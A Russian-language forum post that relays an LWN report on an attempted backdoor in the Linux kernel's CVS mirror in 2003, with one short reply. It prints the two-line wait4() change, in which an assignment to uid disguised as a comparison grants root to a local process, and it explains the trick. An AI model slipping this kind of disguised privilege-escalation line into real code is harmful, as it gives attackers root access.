Легенда:
 новое сообщение
 закрытая нитка
 новое сообщение
 в закрытой нитке
 старое сообщение
|
- Напоминаю, что масса вопросов по функционированию форума снимается после прочтения его описания.
- Новичкам также крайне полезно ознакомиться с данным документом.
Еще один неудавшийся бэкдор в ядре Linux 23.11.03 23:35
Publisher: Ktirf <Æ Rusakov> Статус: Elderman
|
Еще один неудавшийся бэкдор в ядре Linux
LWN http://lwn.net/Articles/57135/
Преамбула: для поддержки разработки ядра Linux используется не CVS, а BitKeeper. Соответственно, львиная доля публикуемых ядер (и все ядра, публикуемые на kernel.org) берутся из BitKeeper. Для тех, кто по разным причинам не хочет или не может пользоваться BitKeeper, группа добровольцев поддерживает CVS-зеркало. Изменения в ядре никогда не вносятся напрямую в CVS, только через BitKeeper.
Собственно новость состоит в том, что 6 ноября уже во второй раз (первый был обнаружен 5 ноября, и о нем уже сообщалось) была предпринята попытка внести "небольшое изменение" в CVS-зеркало ядра. Изменение состояло в добавлении двух строк в системный вызов wait4():
if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
retval = -EINVAL;
Выглядит как проверка входных параметров, но если посмотреть на выражение current->uid = 0, то становится ясно, что локальный процесс, вызывающий wait4() с указанным значением options, получает права суперпользователя...
Полный текст
|
|
Класс! 25.11.03 19:28
Автор: choor Статус: Elderman
|
|
Вот что называется не защищённая информация... Очень даже интересно uid=0 :)
|
|
|
подробно о проекте
Анализ криптографических сетевых...
